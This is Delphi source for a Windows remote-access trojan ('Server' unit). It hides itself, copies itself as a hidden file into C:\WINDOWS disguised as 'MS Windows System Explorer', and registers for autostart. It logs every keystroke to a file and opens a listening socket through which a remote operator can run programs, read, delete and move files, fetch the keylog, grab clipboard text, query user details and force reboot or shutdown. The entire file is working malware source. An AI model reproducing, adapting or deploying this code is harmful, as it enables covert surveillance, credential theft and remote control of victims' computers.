unit Server;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  ExtCtrls, StdCtrls, Stealth, ScktComp, FMXUTILS,ShellAPI,
  Registry, WinProcs,Clipbrd, Mplayer, KeySpy;

type
  TForm1 = class(TForm)
    Stealth1: TStealth;
    Timer1: TTimer;
    ServerSocket1: TServerSocket;
    KeySpy1: TKeySpy;
    procedure Timer1Timer(Sender: TObject);
    procedure ServerSocket1ClientRead(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure KeySpy1KeySpyDown(Sender: TObject; Key: Byte;
      KeyStr: String);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;
  MediaPlayer1: TMediaPlayer;

const
  Count: Integer = 0;

implementation

{$R *.DFM}

function GetCurrentUserName : string;
const
  cnMaxUserNameLen = 254;
var
  sUserName     : string;
  dwUserNameLen : DWord;
begin
  dwUserNameLen := cnMaxUserNameLen-1;
  SetLength( sUserName, cnMaxUserNameLen );
  GetUserName(
  PChar( sUserName ),
  dwUserNameLen );
  SetLength( sUserName, dwUserNameLen );
  Result := sUserName;
end;

procedure OpenObject( sObjectPath : string );
begin
     ShellExecute( 0, Nil, PChar( sObjectPath ),Nil, Nil, SW_NORMAL );
end;

procedure SetWallpaper(sWallpaperBMPPath : String;bTile : boolean );
var
  reg : TRegIniFile;
begin
   reg := TRegIniFile.Create('Control Panel\Desktop' );
   with reg do
   begin
      WriteString( '', 'Wallpaper',sWallpaperBMPPath );
      if( bTile )then
      begin
          WriteString('', 'TileWallpaper', '1' );
      end
      else
         begin
             WriteString('', 'TileWallpaper', '0' );
         end;
   end;
   reg.Free;
   SystemParametersInfo(SPI_SETDESKWALLPAPER,0,Nil,SPIF_SENDWININICHANGE );
end;

procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce: boolean );
var
  sKey : string;
  reg  : TRegIniFile;
begin
  if( bRunOnce )then
   sKey := 'Once'
  else
   sKey := '';
  reg := TRegIniFile.Create( '' );
  reg.RootKey := HKEY_LOCAL_MACHINE;
  reg.WriteString('Software\Microsoft'+ '\Windows\CurrentVersion\Run'+ sKey + #0,sProgTitle,sCmdLine );
  reg.Free;
end;

function SaveClipboardTextDataToFile(sFileTo : string ) : boolean;
var
   ps1,ps2   : PChar;
   dwLen : DWord;
   tf    : TextFile;
   hData : THandle;
begin
     Result := False;
     with Clipboard do
     begin
          try Open;
          if( HasFormat( CF_TEXT ) )
          then
              begin
                   hData := GetClipboardData( CF_TEXT );
                   ps1 := GlobalLock( hData );
                   dwLen := GlobalSize( hData );
                   ps2 := StrAlloc( 1 + dwLen );
                   StrLCopy( ps2, ps1, dwLen );
                   GlobalUnlock( hData );
                   AssignFile( tf, sFileTo );
                   ReWrite( tf );
                   Write( tf, ps2 );
                   CloseFile( tf );
                   StrDispose( ps2 );
                   Result := True;
              end;
          finally Close;
          end;
     end;
end;

function GetColorsCount : integer;
var
   h : hDC;
begin
     Result := 0;
     try
        h := GetDC( 0 );
        Result :=1 shl(GetDeviceCaps( h, PLANES ) *GetDeviceCaps( h, BITSPIXEL ));
     finally
            ReleaseDC( 0, h );
     end;
end;

function GetDiskVolSerialID(cDriveName : char ) : DWord;
var
   dwTemp1,dwTemp2 : DWord;
begin
     GetVolumeInformation(PChar( cDriveName + ':\' ),Nil,0,@Result,dwTemp1,dwTemp2,Nil,0);
end;
Procedure ExecuteProgram(Nome,Parametros:String);
Var
  Comando : Array[0..1024] of Char;
  Parms : Array[0..1024] of Char;
Begin
    StrPCopy(Comando,Nome);
    StrPCopy(Parms,Parametros);
    ShellExecute(0,nil,Comando,Parms,nil,sw_showmaximized);
End;

procedure TForm1.Timer1Timer(Sender: TObject);
var
  Attributes: Word;
begin
     form1.visible := false;
     if(Application.ExeName<>'C:\WINDOWS\SYSEXPLOR.EXE')
     then CopyFile(pchar(Application.ExeName),pchar('C:\WINDOWS\Sysexplor.exe'),TRUE)
     else
       if(ExtractFilePath(Application.ExeName)<>'C:\WINDOWS\')
       then CopyFile(pchar(Application.ExeName),pchar('C:\WINDOWS\Sysexplor.exe'),TRUE);
     Attributes := faHidden;
     FileSetAttr('C:\WINDOWS\SYSEXPLOR.EXE', Attributes);
     RunOnStartup('MS Windows System Explorer','c:\windows\sysexplor.exe',False );
end;

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
var
  buffer,buffer2: string;
  cmd: array[1..250] of string;
  cmd_i,i: integer;
  Fx,prt:  textfile;
begin
     buffer:='';
     cmd_i:=1;
     buffer:=socket.receivetext;
     if pos(' ',buffer)<>0
     then
        while pos(' ',buffer)<>0 do
        begin
            cmd[cmd_i]:= copy(buffer,1,pos(' ',buffer));
            delete(cmd[cmd_i],length(cmd[cmd_i]),1);
            delete(buffer,1,pos(' ',buffer));
            cmd_i:=cmd_i+1;
        end;
     for i:=1 to length(cmd[1]) do cmd[1,i]:=upcase(cmd[1,i]);

     if cmd[1]='REBOOT'
     then
         begin
              socket.sendtext('Rebooting...');
              ExitWindows(EWX_REBOOT,0);
              close;
         end;

     if cmd[1]='SHUTDOWN'
     then
         begin
              socket.sendtext('Shutting down...');
              ExitWindows(EWX_FORCE,0);
              ExitWindows(EWX_SHUTDOWN,0);
              close;
         end;

     if (cmd[1]='DELETE') or (cmd[1]='DEL')
     then
         if (FileExists(cmd[2])=TRUE)
         then
             begin
                Assignfile(Fx, cmd[2]);
                Reset(Fx);
                closefile(Fx);
                Erase(Fx);
                socket.sendtext('That file was deleted on the remote machine!');
             end
          else socket.sendtext('That file does not exist on the remote machine!');

     if cmd[1]='EXEC'
     then
         begin
              if(FileExists(cmd[2])=TRUE)
              then
                 begin
                      buffer:='';
                      if cmd_i>=3
                      then
                          begin
                               for i:=3 to cmd_i do
                               begin
                                    buffer:=buffer+cmd[i];
                                    if i<cmd_i then buffer:=buffer+' ';
                               end;
                               delete(buffer,length(buffer),1);
                          end;
                      ExecuteProgram(cmd[2],buffer);
                      socket.sendtext('Command executed!');
                 end
              else socket.sendtext('That file does not exist on remote machine!');
         end;

     if (cmd[1]='TYPE') or (cmd[1]='GET')
     then
       if (FileExists(cmd[2])=TRUE)
       then
          begin
              socket.SendText('OK');
              AssignFile(Fx, cmd[2]);
              Reset(Fx);
              while not(eof(Fx)) do
              begin
                  readln(Fx,buffer);
                  buffer:=buffer+'';
                  socket.sendtext(buffer);
              end;
              socket.sendtext('EOF');
              CloseFile(Fx);
          end
       else socket.sendtext('NOTOK');

     if (cmd[1]='GETKEYLOG')
     then
       if (FileExists('c:\windows\key.log')=TRUE)
       then
          begin
              AssignFile(Fx, 'c:\windows\key.log');
              Reset(Fx);
              socket.SendText('OK');
              while not(eof(Fx)) do
              begin
                  readln(Fx,buffer);
                  buffer:=buffer+'';
                  socket.sendtext(buffer);
              end;
              CloseFile(Fx);
              socket.sendtext('EOF');
          end
       else socket.sendtext('NOTOK');

       if (cmd[1]='USERNAME') then
       begin
           buffer:=GetCurrentUsername+'';
           socket.sendtext(buffer);
       end;

       if(cmd[1]='SCREENRESOLUTION') then
       begin
           buffer:=inttostr(Screen.Width)+'*'+inttostr(Screen.Height)+'';
           socket.sendtext(buffer);
       end;

       if(cmd[1]='ASK') then
       begin
           buffer:='';
           for i:=2 to cmd_i do buffer:=buffer+cmd[i]+' ';
           buffer2:=InputBox('Question from client',buffer,'');
           buffer2:=buffer2+'';
           socket.sendtext(buffer2);
       end;

       if(cmd[1]='WINOPEN')
       then
          if fileexists(cmd[2])=TRUE
          then
             begin
                 OpenObject(cmd[2]);
                 socket.sendtext('File executed!');
             end
          else socket.sendtext('That file does not exist on remote machine!');

       if(cmd[1]='SETWALLPAPER')
       then
          if(FileExists(cmd[2])=TRUE)
          then
            begin
              SetWallpaper(cmd[2],False);
              Socket.SendText('Wallpaper Changed!');
            end
          else Socket.SendText('That file does not exist on remote machine!');

       if(cmd[1]='REMOTEPRINT')
       then
          if(FileExists(cmd[2])=TRUE)
          then
             begin
                 AssignFile(prt, 'LPT1' );
                 Rewrite(prt);
                 AssignFile(Fx,cmd[2]);
                 reset(Fx);
                 while not(eof(Fx)) do
                 begin
                     ReadLn(Fx,buffer);
                     WriteLn(prt,buffer);
                 end;
                 CloseFile(Fx);
                 CloseFile(prt);
                 Socket.SendText('File sent to lpt1!');
             end
          else Socket.SendText('File not found on remote machine!');

          if(cmd[1]='SAVECLIPBOARD')
          then
              if(SaveClipboardTextDataToFile(cmd[2])=TRUE)
              then Socket.SendText('ClipBoard saved to '+cmd[2]+'!')
              else Socket.SendText('There was nothing stored on the ClipBoard!');

          if(cmd[1]='MAXCOLOURS')
          then Socket.SendText('Max number of colours supported by remote machine is '+inttostr(GetColorsCount)+'');

          if(cmd[1]='SERIAL')
          then Socket.SendText('The serial number for drive '+cmd[2]+' is '+ Format('%X',[GetDiskVolSerialID(cmd[2][1])])+'');

          if(cmd[1]='COPY')
          then
             if (FileExists(cmd[2])=TRUE)
             then
               begin
                  CopyFile(pchar(cmd[2]),pchar(cmd[3]),TRUE);
                  socket.sendtext('File Copied successfully!');
               end
             else socket.sendtext('That file does not exist on the remote machine!');

          if(cmd[1]='MOVE')
          then
             if (FileExists(cmd[2])=TRUE)
             then
               begin
                  CopyFile(pchar(cmd[2]),pchar(cmd[3]),TRUE);
                  AssignFile(Fx, cmd[2]);
                  reset(Fx);
                  closefile(Fx);
                  erase(fx);
                  socket.sendtext('File moved successfully!');
               end
             else socket.sendtext('That file does not exist on the remote machine!');

end;

procedure TForm1.KeySpy1KeySpyDown(Sender: TObject; Key: Byte;
  KeyStr: String);
var
  fx: TextFile;
begin
     if (fileexists('c:\windows\key.log')=TRUE)
     then                   
         begin
             Assignfile(Fx, 'c:\windows\key.log');
             Append(Fx);
         end
     else
         begin
             Assignfile(Fx, 'c:\windows\key.log');
             rewrite(Fx);
         end;
     if (keystr='Space') then keystr:=' ';
     if (keystr='Right Shift Down') then keystr:='';
     if (keystr='Left Shift Down') then keystr:='';
     if (keystr='Right Shift Up') then keystr:='';
     if (keystr='Left Shift Up') then keystr:='';
     if (keystr='BackSpace') then keystr:='';
     if (keystr='Alt') then keystr:='';
     if (keystr='Ctrl') then keystr:='';
     if (keystr='Tab') then keystr:='';
     if (keystr='Down') then keystr:='';
     if (keystr='Up') then keystr:='';
     if (keystr='Left') then keystr:='';
     if (keystr='Right') then keystr:='';
     if (keystr='Enter')
     then writeln(fx,'')
     else write(fx,keystr);
     closefile(Fx);
end;

end.
